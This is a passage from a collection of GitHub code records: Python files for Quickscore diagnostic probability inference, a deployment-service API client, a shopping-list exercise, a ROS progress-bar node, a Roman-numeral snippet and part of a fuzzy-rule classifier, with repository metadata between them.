* self.PD[i] + (self.oneMinusPD(i)))\n            res = res + sign * out_prod\n            if showStatus and iteration%round((2**len(present_findings))/8)==0:\n                print(iteration/(2**len(present_findings))*100,'%')\n            iteration += 1\n        return res\n\n    def probability_of_findings_opt3(self, present_findings, absent_findings, d_i=None, showStatus = False):\n        '''\n        The probability that a mixture of findings will be present or absent.\n        Absorbs negative findings first.\n        '''\n\n        local_PD = list(self.PD)\n\n\n        #Absorb evidence from the negative findings\n        for i in absent_findings:\n            for j in util.get_diseases_related_to_finding(self.Q, i):\n                local_PD[j] *= (1-self.Q[i,j])\n\n        res = 0\n        iteration = 0\n        for F in _powerset(present_findings):\n            sign = (-1) ** len(F)\n            out_prod = 1\n            for i in util.parents_of_findings(self.Q, F + absent_findings):\n                inn_prod = 1\n                for f in F:\n                    inn_prod = inn_prod * (1 - self.Q[f, i])\n\n                if (i == d_i):\n                    out_prod = out_prod * inn_prod\n                else:\n                    out_prod = out_prod * (inn_prod * local_PD[i] + (self.oneMinusPD(i)))\n            res = res + sign * out_prod\n            if showStatus and iteration%round((2**len(present_findings))/8)==0:\n                print(iteration/(2**len(present_findings))*100,'%')\n            iteration += 1\n        return res\n    \n    def probability_of_findings_given_not_di(self, present_findings, absent_findings, d_i = None):\n        ''' \n        Implements equation 11 from paper: The probability that a mixture of findings will be present or absent.\n        \n        If d_i is set the conditional probability of the findings given disease d_i=0 (i.e. not present) will be returned\n        '''\n        res = 0\n        for F in _powerset(present_findings):\n            sign = (-1)**len(F)\n            out_prod = 1\n            for i in range(self.N_disease()):\n                inn_prod = 1\n                for f in F+absent_findings:\n                    inn_prod = inn_prod*(1-self.Q[f,i])\n\n                if(i==d_i):\n                    out_prod = out_prod # * inn_prod # This is the only change compared to other method.\n                else:\n                    out_prod = out_prod * ( inn_prod*self.PD[i]+(self.oneMinusPD(i)))\n            res = res + sign*out_prod\n        return res\n    \n\n    def posterior_d(self,present_findings, absent_findings, disease):\n        ''' \n        The posterior probability of disease given the findings\n        '''\n        num = self.probability_of_findings(present_findings, absent_findings, disease) * self.PD[disease]\n        den = self.probability_of_findings(present_findings, absent_findings)\n        print(den)\n        if num==0 or den ==0:\n            return 0\n        else:\n            return num/den\n    \n    def mple_dis_post_slow(self,diseases,present_findings, absent_findings):\n        '''\n        Gives posterior over each disease in diseases given the set of symptoms. Implemented in a brute force manner\n        '''\n        res = {}\n        for i in diseases:\n            res[i] = self.posterior_d(present_findings,absent_findings,i)\n        return res\n    \n    \n    # Caching strategies\n    \n    \n    def mple_dis_post_fast(self,diseases,present_findings, absent_findings):\n        '''\n        Gives posterior over each disease in diseases given the set of symptoms. 
Implemented with a preprocessing step that caches\n        some probabilities beforehand.\n        '''\n        res = {}\n        # Preprocessing step\n        P_only_di = {}\n        for F in _powerset_tuple(tuple(present_findings)):\n            for i in range(self.N_disease()):\n                entry_F_i = 1\n                for f in F+tuple(absent_findings):\n                    entry_F_i = entry_F_i * (1-self.Q[f,i])\n                P_only_di[F,i] = entry_F_i\n\n        # Calculate denominator(joint probability)\n\n        den = self.probability_of_findings(list(present_findings), list(absent_findings))\n        \n        #Check if denominator is 0\n        if den==0:\n            for i in diseases:\n                res[i] = 0\n        else:\n            # Calculate posterior for each query disease\n            for i in diseases:\n                res_sum = 0\n                for F in _powerset_tuple(tuple(present_findings)):\n                    sign = (-1)**len(F)\n                    out_prod = 1\n                    for ii in range(self.N_disease()):\n                        if ii != i:\n                            out_prod = out_prod*(P_only_di[F,ii]*self.PD[ii]+(self.oneMinusPD(ii)))\n                        else:\n                            out_prod = out_prod*(P_only_di[F,ii])\n                    res_sum = res_sum + sign*out_prod\n\n                res[i] = res_sum*self.PD[i]/den\n\n\n\n        return res\n\n    def mple_dis_post_fast_v3(self, diseases, present_findings, absent_findings, return_finding_prob=False):\n        '''\n        Gives posterior over each disease in diseases given the set of symptoms. Implemented with a preprocessing step that caches\n        some probabilities beforehand.\n\n        This revision only iterates over relevant parents in the making of the dictionary\n\n        '''\n        res = {}\n        relevant_parents = util.parents_of_findings(self.Q, present_findings + absent_findings)\n        # Preprocessing step\n        P_only_di = {}\n        dict2 = {}\n        denn = 0\n        for F in _powerset_tuple(tuple(present_findings)):\n            F_entry = 1\n            for i in relevant_parents:\n                entry_F_i = 1\n                for f in F + tuple(absent_findings):\n                    entry_F_i = entry_F_i * (1 - self.Q[f, i])\n                P_only_di[F, i] = entry_F_i\n                # Extra preprocessing step: For each element in the powerset, calculate the associated product. This will be saved in a dict with an entry for each element.\n                F_entry = F_entry * (entry_F_i * self.PD[i] + (1 - self.PD[i]))\n            # Calculate the denominator here. This is the sum (with correct sign) of the entries in dict2\n            denn = denn + (-1) ** len(F) * F_entry\n            dict2[F] = F_entry\n\n        # Calculate denominator(joint probability)\n        # Check if denominator is 0\n        if denn == 0:\n            print('Probability of findings is 0. 
Division by zero.')\n for i in diseases:\n res[i] = 0\n\n\n else:\n # Calculate posterior for each query disease\n for i in diseases:\n if i in relevant_parents:\n res_sum = 0\n for F in _powerset_tuple(tuple(present_findings)):\n sign = (-1) ** len(F)\n P_only_di[F, i]\n # for each entry in dict2 divide out the factor that is superfluous and multiply with the correct factor.\n e = (dict2[F] / (P_only_di[F, i] * self.PD[i] + (1 - self.PD[i]))) * P_only_di[F, i]\n res_sum = res_sum + sign * e\n res[i] = res_sum * self.PD[i] / denn\n else:\n res[i] = self.PD[i]\n\n if return_finding_prob == False:\n return res\n else:\n return res, denn\n \n \n \n def PPositiveFindings_sequential(self,result_old,powerset_old,find_new):\n '''Function that calculates probability of positive findings by adding them sequentially'''\n added_term=0\n \n new_sets = [s+[find_new] for s in powerset_old]\n res=0\n # Calculate contributions from new terms\n for F in new_sets:\n sign = (-1)**len(F)\n out_prod = 1\n for i in range(self.N_disease()):\n inn_prod = 1\n for f in F:\n inn_prod = inn_prod*(1-self.Q[f,i])\n out_prod = out_prod * ( inn_prod*self.PD[i]+(self.oneMinusPD(i)))\n res = res + sign*out_prod\n result_new = result_old + res\n \n powerset_new = powerset_old+new_sets\n \n return result_new,powerset_new\n\n \n def calculate_innerprod_dic(self, positive_findings,negative_findings):\n '''Calculate the inner product dictionary '''\n P_only_di = {}\n \n for F in _powerset_tuple(tuple(positive_findings)):\n for i in range(self.N_disease()):\n entry_F_i = 1\n for f in F+tuple(negative_findings):\n entry_F_i = entry_F_i * (1-self.Q[f,i])\n P_only_di[F,i] = entry_F_i\n powerset_generator = _powerset(positive_findings)\n return P_only_di, list(powerset_generator)\n\n \n def extend_ipdic_nfinding(self, dic, powerset_old, new_negative_finding, old_result):\n '''Function to updating the inner product dictionary with the information from a single negative finding'''\n res = 0\n for F in powerset_old:\n sign = (-1)**len(F)\n prod = 1\n for i in range(self.N_disease()):\n #Update dictionary entry:\n dic[tuple(F),i] = dic[tuple(F),i] * (1-self.Q[new_negative_finding,i])\n prod = prod*( dic[tuple(F),i] * self.PD[i] + (self.oneMinusPD(i)))\n res = res + sign*prod\n return dic, res\n\n \n def extend_ipdic_pfinding(self, dic, powerset_old, negative_findings,new_positive_finding, old_result):\n '''Function to update the dictionary with the new sets coming from the new finding and updating the probability result at the same time.'''\n #old_powerset_as_list = list(powerset_old)\n #new_sets = [s+[new_positive_finding] for s in old_powerset_as_list]\n new_sets = [s+[new_positive_finding] for s in powerset_old]\n added_res = 0\n for F in new_sets:\n sign = (-1)**len(F)\n prod=1\n for i in range(self.N_disease()):\n entry_F_i = 1\n for f in F+negative_findings:\n entry_F_i = entry_F_i * (1-self.Q[f,i])\n dic[tuple(F),i] = entry_F_i\n prod = prod*(entry_F_i * self.PD[i] + (self.oneMinusPD(i)))\n added_res = added_res + sign*prod\n new_powerset = list(powerset_old) + new_sets\n new_result = old_result + added_res\n return dic, new_powerset, new_result\n \n def probability_of_findings_dict_based(self, positive_findings, negative_findings, dic, powerset):\n '''Function to calculate joint probability of the findings given that the inner product dictionary dic is already calculated'''\n res = 0\n #for F in _powerset_tuple(tuple(positive_findings)):\n for F in powerset:\n sign = (-1)**len(F)\n prod = 1\n for i in range(self.N_disease()):\n 
#print(dic[F,i])\n                #assert type(dic[F,i]) == np.float64, 'Not float'\n                F = tuple(F)\n                prod = prod*( dic[F,i] * self.PD[i] + (self.oneMinusPD(i)))\n            res = res + sign*prod\n        return res \n\n    def add_finding(self, state, finding,dic = None, result = None,powerset = None, positive_findings = [], negative_findings = []):\n        \n        # Handle initial setup when dic and result are None\n        #_________________________________________________\n        \n        if dic is None:\n            if state == 'positive':\n                dic,powerset = self.calculate_innerprod_dic([finding],[])\n                positive_findings = positive_findings + [finding]\n            elif state =='negative':\n                dic,powerset = self.calculate_innerprod_dic([],[finding])\n                negative_findings = negative_findings + [finding]\n            else:\n                assert False, \"State has to be negative or positive\"\n        \n        \n        if result is None:\n            result = self.probability_of_findings_dict_based([finding], [], dic, powerset) if state == 'positive' else self.probability_of_findings_dict_based([], [finding], dic, powerset)\n        #_________________________________________________\n        \n        outer = self\n        \n        class resultClass:\n            def res(self):\n                if result is not None:\n                    return result\n                else:\n                    print('Error: no result yet')\n            \n            def add_finding(self,state,_finding):\n                if state == 'positive':\n                    new_dic,new_powerset,new_result = outer.extend_ipdic_pfinding(dic,powerset, negative_findings,_finding, result)\n                    new_positive_findings = positive_findings + [_finding]\n                    return outer.add_finding(None, None, dic = new_dic, result = new_result,powerset = new_powerset, positive_findings = new_positive_findings, negative_findings = negative_findings)\n                if state == 'negative':\n                    new_dic,new_result = outer.extend_ipdic_nfinding(dic, powerset, _finding, result)\n                    new_negative_findings = negative_findings + [_finding]\n                    return outer.add_finding(None, None, dic = new_dic, result = new_result, powerset = powerset, positive_findings = positive_findings, negative_findings = new_negative_findings)\n                else:\n                    assert False, \"State has to be negative or positive\"\n        res = resultClass()\n        return res\n","repo_name":"snejdwarf/CDSS","sub_path":"src/quickscore/Quickscore.py","file_name":"Quickscore.py","file_ext":"py","file_size_in_byte":18545,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"3165644271","text":"__all__ = [\n    \"WBAPIUnauthorizedError\",\n    \"WBAPI\"\n]\n\nimport requests\nfrom requests.exceptions import HTTPError as WBAPIHTTPError\nfrom requests.packages.urllib3.util import Retry\nfrom requests.adapters import HTTPAdapter\n\nfrom urlparse import urljoin\nfrom functools import wraps\n\n\nclass WBAPIUnauthorizedError(WBAPIHTTPError):\n    pass\n\n\ndef catch_api_http_exception(f):\n    @wraps(f)\n    def wrapper(*args, **kwds):\n        try:\n            r = f(*args, **kwds)\n        except WBAPIHTTPError as e:\n            if e.response.status_code in [401, 403]:\n                raise WBAPIUnauthorizedError(response=e.response)\n            else:\n                raise\n        return r\n    return wrapper\n\n\nclass FakeResponse(object):\n    content = None\n    status_code = None\n\n    def json(self):\n        return self.content\n\n\nclass WBAPI(object):\n    def __init__(self, base_uri, connect_timeout=5, read_timeout=30):\n        self.__base_uri = base_uri\n        self.__api_uri = urljoin(base_uri, \"api/\")\n\n        self.__session = requests.Session()\n        requests_http_adapter = HTTPAdapter(\n            Retry(total=10, status_forcelist=[502, 500], backoff_factor=0.5))\n        self.__session.mount('https://', requests_http_adapter)\n        self.__session.mount('http://', requests_http_adapter)\n\n        self.__timeout = (connect_timeout, read_timeout)\n\n    def 
get_token(self):\n try:\n return self.__session.headers['Authorization'].split()[1]\n except KeyError:\n return None\n\n def set_token(self, token):\n self.__session.headers['Authorization'] = \"Token {}\".format(token)\n\n @catch_api_http_exception\n def login(self, username, password):\n session = self.__session\n\n r = session.post(\n urljoin(self.__base_uri, \"token/\"),\n {\"username\": username, \"password\": password}, timeout=self.__timeout)\n try:\n r.raise_for_status()\n except WBAPIHTTPError as e:\n try:\n assert e.response.json()[\"non_field_errors\"][0] == \"Unable to log in with provided credentials.\"\n except:\n raise e\n fake_response = FakeResponse()\n fake_response.content = {\"details\": e.response.json()[\"non_field_errors\"][0]}\n fake_response.status_code = 401\n unauthed_exception = WBAPIUnauthorizedError(response=fake_response)\n raise unauthed_exception\n token = r.json()['token']\n self.set_token(token)\n\n @catch_api_http_exception\n def get_apps(self):\n r = self.__session.get(urljoin(self.__api_uri, \"apps/\"), timeout=self.__timeout)\n r.raise_for_status()\n apps = r.json()\n return [\n dict(a.items() + {\"stages\": {s[\"name\"]: s for s in a[\"stages\"]}}.items())\n for a in apps\n ]\n\n @catch_api_http_exception\n def get_stages(self):\n r = self.__session.get(urljoin(self.__api_uri, \"stages/\"), timeout=self.__timeout)\n r.raise_for_status()\n return r.json()\n\n @catch_api_http_exception\n def deploy_app(self, app, stage, version):\n r = self.__session.put(\n urljoin(self.__api_uri, \"apps/{}/stages/{}/version/{}/\".format(app, stage, version)),\n timeout=self.__timeout)\n r.raise_for_status()\n","repo_name":"hmrc/wristband-frontend","sub_path":"wb_api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41707870062","text":"shopping_list = []\n\ndef show_help():\n print(\"\\nSeparate each item with a comma\")\n print(\"Type DONE to quit, SHOW to see the current list, and HELP to get this message\")\n\ndef show_list():\n count = 1\n for item in shopping_list:\n print(\"{} -> {}\".format(count, item))\n count += 1\n\ndef prompt():\n print(\"\\nGive me a list of things you want to shop for: \")\n\nshow_help()\n\nwhile True:\n prompt()\n new_stuff = input(\">>\")\n\n if new_stuff == \"DONE\":\n print(\"\\nHere's your list:\")\n show_list()\n break\n elif new_stuff == \"HELP\":\n show_help()\n continue\n elif new_stuff == \"SHOW\":\n show_list()\n continue\n else:\n new_list = new_stuff.split(\",\")\n index = input(\"Add this at a certain spot? Press ENTER to insert at the end of the list\"\n \"\\nor give me a number to place it at a certain spot. 
You currently have {} items in your list: \".format(len(shopping_list)))\n if index:\n spot = int(index)-1\n for item in new_list:\n shopping_list.insert(spot, item.strip())\n spot += 1\n else:\n for item in new_list:\n shopping_list.append(item.strip())\n","repo_name":"Lumiras/Treehouse-Python-Scripts","sub_path":"Beginning_python/general_exercises/shopping_list_3.py","file_name":"shopping_list_3.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20425598805","text":"#!/usr/bin/env python\nimport roslib\nroslib.load_manifest('lia_progress')\nimport rospy\nimport numpy\nimport cv\n\nfrom sensor_msgs.msg import Image\nfrom cv_bridge.cv_bridge import CvBridge \nfrom cv_bridge.cv_bridge import CvBridgeError\nfrom lia_messages.msg import ProgressMsg\n\nclass Progress_Bar(object):\n\n def __init__(self):\n self.image_shape = (15,640,3)\n self.empty_color = (230,230,230)\n self.fill_color = (0,0,200)\n self.base_array = 255*numpy.ones(self.image_shape,dtype=numpy.uint8)\n for i in range(0,3):\n self.base_array[:,:,i] = self.empty_color[i]\n self.bridge = CvBridge()\n rospy.init_node('progress_bar')\n\n # Pulications\n self.pub = rospy.Publisher('image_progress_bar', Image)\n\n # Subscriptions\n self.sub = rospy.Subscriber('progress',ProgressMsg,self.handle_progress_msg)\n\n\n def handle_progress_msg(self,data):\n frame_count = data.frame_count \n progress_t = data.progress_t \n record_t = data.record_t\n image_array = numpy.array(self.base_array)\n if record_t > 0:\n fill_ind = int(self.image_shape[1]*progress_t/record_t)\n else:\n fill_ind = self.image_shape[1]\n for i in range(0,3):\n image_array[:,:fill_ind,i] = self.fill_color[i]\n cv_image = cv.fromarray(image_array)\n rosimage = self.bridge.cv_to_imgmsg(cv_image,'rgb8')\n self.pub.publish(rosimage)\n\n def run(self):\n rospy.spin()\n\n# -----------------------------------------------------------------------------\nif __name__ == '__main__':\n\n node = Progress_Bar()\n node.run()\n\n\n","repo_name":"iorodeo/lia_video","sub_path":"lia_progress/nodes/progress_bar_node.py","file_name":"progress_bar_node.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16751505410","text":"str=\"MCMXCIV\"\nres=0\npre=0\nroman={\"I\":1,\"V\":5,\"X\":10,\"L\":50,\"C\":100,\"D\":500,\"M\":1000}\nfor x in str:\n res=res+roman[x]\n if(pre [110 001 and [ 000\n 111 011] 110 ]\n 2. Convert the bit matrices into \"business\" matrices i.e. matrices\n with numbers that represents something for the fuzzy system (e.g. the\n index of the variable to used for a particular antecedent.\n [110 001 and [ 000 -> [6 1 and [0\n 111 011] 110 ] 7 3] 6]\n For example this could means that the 2nd rule uses the var 7 and 3 and\n set the consequent to 6th class.\n\n 3. Uses these matrices to build the fuzzy system and all their parts (\n fuzzy rules, linguistic variables,...)\n\n\n **Specie 1 - the MFs**\n The shape of the 1d bit array of sp1 is the following:\n [ lv0p0, lv0p1, ..., lv0pK, lv1p0, lv1p2, ..., lv1pK,\n lv2p0, lv2p1, ..., lvIp0, lvIp1, ...., ..., lvIpK ]\n\n Where:\n K = p_position_per_lv\n I = n_lv_per_ind_sp1\n\n An individual of sp1 (i.e. an instance of this bit array) can been seen as\n a pool of linguistic variables defined by their respective p-points. 
The\n size of the pool is I.\n\n This bit array will be converted to a matrix called r_mfs.\n\n r_mfs is a KxI matrix like this:\n\n ^ ||<------------- p_positions --------->|\n | |-----||-------|-------|-------|-----|-------|\n n_lv_per_ind | lv0 || lv0p0 | lv0p1 | lv0p2 | ... | lv0pK |\n | | lv1 || lv1p0 | lv1p1 | lv1p2 | ... | lv1pK |\n v | lvI || lvIp0 | lvIp1 | lvIp2 | ... | lvIpK |\n\n\n Meaning: lvipj is the j-th point (or p position) of the i-th linguistic\n variable of the pool. lvipj values are in [0, 1]. This kind of represents the\n percentage of a variable (which needs to be scaled in [0,1] beforehand).\n You might want to pre-process outliers before running TrefleClassifier.\n For example, for a triangular LV (triLV) the value lv4p1 is represented by\n 'p1' on the x-axis:\n\n\n Membership functions for variable 4\n ^\n | low medium high\n 1 | X X XX\n | X X X XX\n | X X X XX\n | X X XX X\n | XX XXX\n | X X XX XX\n | X X XX XX\n | X X XX\n 0 +--------------------------------------> 1\n p0 *p1* p2\n\n In \"lvipK\" the \"K\" defines the number of p-positions a linguistic variable has.\n In the case of a triangular membership function (as it has been implemented\n so far), the number of p-positions (i.e. K) is >= n_labels (i.e. the\n linguistic labels like LOW, MEDIUM and HIGH).\n\n The resolution (i.e. the number of possible values that a p position can\n take is defined by the p_positions_per_lv. So the number of bits needed to\n represent the desired p_positions_per_lv is:\n n_bits_per_mf = ceil(log2(p_positions_per_lv))\n\n The total number of bits used is given by _compute_needed_bits_for_sp1()\n\n\n **Specie 2 - the rules**\n\n\n\n **THIS IS OUTDATED** !!!\n r_sel_vars\n r_lv\n r_labels\n r_cons\n\n\n The shape of the 1d bit array of sp2 is the following:\n [ r0a0, r0a1, ... r0aN, r1a0, r1a1, ... rMaN,\n r0lv0, r0lv1,... r0lvN, r1lv0, r1lv1,... rMlvN,\n r0lbl0, r0lbl1,...r0lblN, r1lbl0, r1lbl1,...rMlblN,\n r0c0, r0c1,...r0cJ, r1c0, r1c1,...rMcJ ]\n\n Where:\n M = n_rules\n N = n_max_vars_per_rule\n J = n_consequents i.e. number of output variables that are NOT mutually\n exclusive\n\n The rules are composed of two parts. The antecedents (Aij) and the\n consequents (Cij).\n\n The Aij part indicates which antecedents/variables are used by the\n model/fis for all its rules. It consists of three \"matrices\" let's call\n them r_sel_vars, r_lv and r_labels.\n\n r_sel_vars is a NxM matrix like this:\n\n ^ ||<----- n_max_vars_per_rule ----->|\n | |-------||------|------|------|-----|------|\n n_rules | rule0 || r0a0 | r0a1 | r0a2 | ... | r0aN |\n | | rule1 || r1a0 | r1a1 | r1a2 | ... | r1aN |\n v | ruleM || rMa0 | rMa1 | rMa2 | ... | rMaN |\n\n A single element e.g. r1a2 is a link/\"pointer\" to the variable index/number\n to use for the 3rd antecedent (a2) of the 2nd rule (r1). A single element\n is in the interval [0, n_vars-1] where n_vars is deduced from X_train.\n\n\n r_lv is a NxM matrix like this:\n\n ^ ||<------- n_max_vars_per_rule ------->|\n | |-------||-------|-------|-------|-----|-------|\n n_rules | rule0 || r0lv0 | r0lv1 | r0lv2 | ... | r0lvN |\n | | rule1 || r1lv0 | r1lv1 | r1lv2 | ... | r1lvN |\n v | ruleM || rMlv0 | rMlv1 | rMlv2 | ... | rMlvN |\n\n A single element e.g. r0lv2 is a link/\"pointer\" to a linguistic variable\n defined in an individual from sp1. This element's value is a number\n representing the index of the lv (i.e. a number in [0, I-1] where I\n is n_lv_per_ind) to use from the paired ind_sp1. 
For example if r0lv2=4 then\n the linguistic variable used for the variable of the 1st rule (r0) and the 3rd (lv2)\n antecedent will be the 5th row of the matrix r_mfs of the paired ind_sp1.\n Note: since elements of r_lv (i.e. antecedents) are pointers to a\n linguistic variable (lvI) it is possible that:\n 1. 2 or more antecedents points to the same lvI (i.e. surjectivity)\n 2. Not all lvI are pointed by an element (i.e. injectivity)\n 3. 2 antecedents or more use the same variable but point to different lvI\n\n The point 3. is a problem because the interpretability criteria tell us that\n a fuzzy variable should use the same definition across all rules. To fix this\n problem, we only keep the last definition of a variable. This is done in\n the C++ part with the map vars_lv_lookup.\n\n r_labels is a NxM matrix like this:\n\n ^ ||<--------- n_max_vars_per_rule --------->|\n | |-------||--------|--------|--------|-----|--------|\n n_rules | rule0 || r0lbl0 | r0lbl1 | r0lbl2 | ... | r0lblN |\n | | rule1 || r1lbl0 | r1lbl1 | r1lbl2 | ... | r1lblN |\n v | ruleM || rMlbl0 | rMlbl1 | rMlbl2 | ... | rMlblN |\n\n A single element e.g. r1mf2 is a link/\"pointer\" to a linguistic label\n (by label we mean for example 0 for LOW, 1 for MEDIUM, 2 for HIGH, ...\n last for DONT_CARE) to use for the variable/antecedent r1a2 of the\n r_sel_vars \"matrix\". For example if r1a2=6, r1lbl2=2 and n_true_labels=4\n (i.e. VERY LOW, LOW, MEDIUM, HIGH) then it would mean that the 3rd\n antecedent (a2) of the 2nd rule (r1) is \"5th variable is MEDIUM\". (5th\n because of \"=6\" and MEDIUM because of lbl=2 with n_true_labels=4). A single\n element is in the interval [0, (n_true_labels + dc_weight)-1].\n With dc_weight=1 all labels have the same probability to be chosen.\n To increase the probability to chose/select a DC, increase dc_weight.\n\n\n The other part of sp2 is Cij. It defines the consequents (i.e. classes\n in a classification problem or a label in a regression problem) that are\n used by the model/fis for all its rules. It consists of a single \"matrix\"\n let's call it r_cons.\n\n r_cons is a JxM matrix like:\n\n\n ^ ||<-------- n_consequents -------->|\n | |-------||------|------|------|-----|------|\n n_rules | rule0 || r0c0 | r0c1 | r0c2 | ... | r0cJ |\n | | rule1 || r1c0 | r1c1 | r1c2 | ... | r1cJ |\n v | ruleM || rMc0 | rMc1 | rMc2 | ... | rMcJ |\n\n A single element e.g. r1c2 is either a class in [0, n_classes-1] if the\n the problem is a classification problem, or a label if the problem\n is a regression problem.\n All columns/consequents are NOT mutually exclusive. Therefore, for iris\n classification problem, you surely want to have 1 consequent that can take\n the values {0, 1, 2} mapped to \"virginica\", \"setosa\", \"versicolor\" since\n they ARE mutually exclusive.\n Therefore, if you want to transform this iris problem into a one-hot version\n of it, create 3 consequents with 2 classes per consequent.\n You can even have a mixed problem (classification and regression). For\n example, just add a column/consequent to the previous iris example. Let's\n call this new consequent the pollen concentration (i.e. a label, let's say\n LOW. 
This label is a positive integer in [0, n_labels_per_cons-1].\n \"\"\"\n\n def __init__(\n self,\n X_train: np.array,\n y_train: np.array,\n n_rules: int,\n n_classes_per_cons: List[int],\n default_cons: np.array,\n n_max_vars_per_rule: int,\n n_labels_per_mf: int,\n n_labels_per_cons: Type[LabelEnum] = Label3,\n p_positions_per_lv: int = 32, # 5 bits\n dc_weight: int = 1,\n n_lv_per_ind_sp1: int = None,\n ):\n \"\"\"\n\n :param X_train: a 2d numpy array representing the train data. Each\n column is a variable and each row is an observation.\n\n :param y_train: a 2d numpy array representing the output classes/values\n for the train data. Each column is a mutually exclusive output (either\n a class or a regression value) and each row is the outputs for an\n observation.\n\n :param n_rules: the number of rules the fuzzy system have. The total\n number of rules is n_rules + 1 (the default rule).\n\n :param n_classes_per_cons: [n_classes_cons0, n_classes_cons1, ...]\n where n_class_consX is the number of classes for the X-th consequent.\n If the consequent is a continuous variable (i.e. regression) set the\n value to 0.\n\n :param default_cons: array of numbers to set the default consequent(s)\n for the default rule. For a consequent representing a class, specify the\n class directly. For a consequent representing a continuous variable,\n specify LabelXXX.YYY (where XXX is the same number as n_labels_per_cons,\n e.g. Label3 and YYY is a label value of this class, e.g. Label3.LOW()).\n Example: for a problem with 2 consequents where the 1st represents a\n class (e.g. n_classes=6) and the 2nd is a continuous variable (e.g.\n split with n_labels_per_cons=Label4) then you can set\n default_cons=[3, Label4.HIGH()]\n\n :param n_max_vars_per_rule: Maximum number of variables to use for a\n single rule. Use this parameter to reduce the size of the fuzzy system.\n\n :param n_labels_per_mf: number of labels per membership function. For\n example, n_labels_per_mf=4 will correspond to \"low, medium, high,\n very high\"\n\n :param n_labels_per_mf: number of labels per membership function. For\n example, n_labels_per_mf=4 will correspond to \"low, medium, high,\n very high\"\n\n :param n_labels_per_cons: number of labels per membership function for\n the consequents (singleton MFs). For example, use 4 to have LOW, MEDIUM,\n HIGH, VERY_HIGH labels. These labels are equally spaced in the range\n (i.e. definition domain of y_train) so when n_labels_per_cons=4, LOW is\n set to 1/4 of abs(cons_min - cons_max).\n\n :param p_positions_per_lv: Integer to represent the\n number of p positions (i.e. the possible values the membership functions\n (MFs) of a linguistic variable (LV) can take). For example, if\n p_positions_per_lv=4, then a MF's inflexion points will be at 0%, 33%,\n 66% 100% of the variable range. In others words, the linguistic variable\n will be cut in p_positions_per_lv. This value must be a multiple of 2.\n\n :param dc_weight: integer. Set the don't care weight. If dc_weight=k\n then a variable v has k more chance to be a don't care. Setting\n dc_weight=0 will lead to create rules that have exactly\n n_max_vars_per_rule. Setting dc_weight to a big number will to lead\n less rules than n_rules because all their antecedents will be set to\n don't care.\n\n :param n_lv_per_ind_sp1: This is an advanced parameter. it's an integer\n to represent the number of MF encoded per individual of sp1. In other\n words it is the pool of MF where the linguistic variable from ind_sp2\n will be defined from. 
Must be >= n_max_vars_per_rule, ideally a\n multiple of 2. If not will be ceil-ed to the closest multiple of 2. If\n the problem you try to solve is big you maybe should increase this\n number. By default, this value is set (before ceiling) to\n n_max_vars_per_rule * n_rules. This ensures that each LV can have its\n own MF.\n \"\"\"\n\n super().__init__()\n self._X, self._X_scaler = CocoIndividual._minmax_norm(X_train)\n self._y = y_train\n self._n_rules = n_rules\n self._n_classes_per_cons = np.asarray(n_classes_per_cons)\n self._default_cons = np.asarray(default_cons)\n self._n_max_vars_per_rule = n_max_vars_per_rule\n self._n_true_labels = n_labels_per_mf\n self._n_labels_cons = n_labels_per_cons\n self._p_positions_per_lv = p_positions_per_lv\n self._dc_weight = dc_weight\n self._mfs_shape = MFShape.TRI_MF\n\n self._n_vars = self._X.shape[1]\n\n if self._n_max_vars_per_rule is None:\n self._n_max_vars_per_rule = self._n_vars\n\n if n_lv_per_ind_sp1 is None:\n n_lv_per_ind_sp1 = self._n_max_vars_per_rule * self._n_rules\n\n self._n_bits_per_lv = ceil(log(n_lv_per_ind_sp1, 2))\n\n try:\n self._n_cons = self._y.shape[1]\n except IndexError: # y is 1d so each element is an output\n self._n_cons = 1\n\n self._cons_n_labels = self._compute_cons_n_labels(self._n_classes_per_cons)\n\n CocoIndividualValidator(self).validate()\n self._default_cons = self._convert_labelenum_to_int(self._default_cons)\n\n self._n_bits_per_mf = ceil(log(self._p_positions_per_lv, 2))\n self._n_bits_per_ant = ceil(log(self._n_vars, 2))\n self._n_bits_per_cons = self._compute_n_bits_per_cons()\n\n # chosen arbitrarily, enough to cover a high number of labels (i.e. 2**5=32)\n self._n_bits_per_label = 5\n\n self._n_bits_sp1 = self._compute_needed_bits_for_sp1()\n self._n_bits_sp2 = self._compute_needed_bits_for_sp2()\n self._ind_sp1_class = FixedSizeBitArrayFactory.create(self._n_bits_sp1)\n self._ind_sp2_class = FixedSizeBitArrayFactory.create(self._n_bits_sp2)\n\n # contains True if i-th cons is a classification variable or False if regression\n self._cons_type = [bool(c) for c in self._n_classes_per_cons]\n\n self._cons_scaler = self._create_cons_scaler()\n\n self._cons_range = np.vstack(\n (self._cons_scaler.data_min_, self._cons_scaler.data_max_)\n ).T.astype(np.double)\n\n self._vars_range = self._create_vars_range(self._X_scaler)\n\n self._nce = NativeCocoEvaluator(\n X_train=self._X,\n n_vars=self._n_vars,\n n_rules=self._n_rules,\n n_max_vars_per_rule=self._n_max_vars_per_rule,\n n_bits_per_mf=self._n_bits_per_mf,\n n_true_labels=self._n_true_labels,\n n_bits_per_lv=self._n_bits_per_lv,\n n_bits_per_ant=self._n_bits_per_ant,\n n_cons=self._n_cons,\n n_bits_per_cons=self._n_bits_per_cons,\n n_bits_per_label=self._n_bits_per_label,\n dc_weight=dc_weight,\n cons_n_labels=self._cons_n_labels,\n n_classes_per_cons=self._n_classes_per_cons,\n default_cons=self._default_cons,\n vars_range=self._vars_range,\n cons_range=self._cons_range,\n )\n\n def predict(self, ind_tuple, X=None):\n ind_sp1, ind_sp2 = self._extract_ind_tuple(ind_tuple)\n\n if X is None:\n y_pred = self._nce.predict_native(ind_sp1, ind_sp2)\n else:\n X_normed = self._X_scaler.transform(X)\n y_pred = self._nce.predict_native(ind_sp1, ind_sp2, X_normed)\n\n return self._post_predict(y_pred)\n\n def to_tff(self, ind_tuple):\n ind_sp1, ind_sp2 = self._extract_ind_tuple(ind_tuple)\n return self._nce.to_tff(ind_sp1, ind_sp2)\n\n def get_y_true(self):\n return self._y\n\n def print_ind(self, ind_tuple):\n ind_sp1, ind_sp2 = 
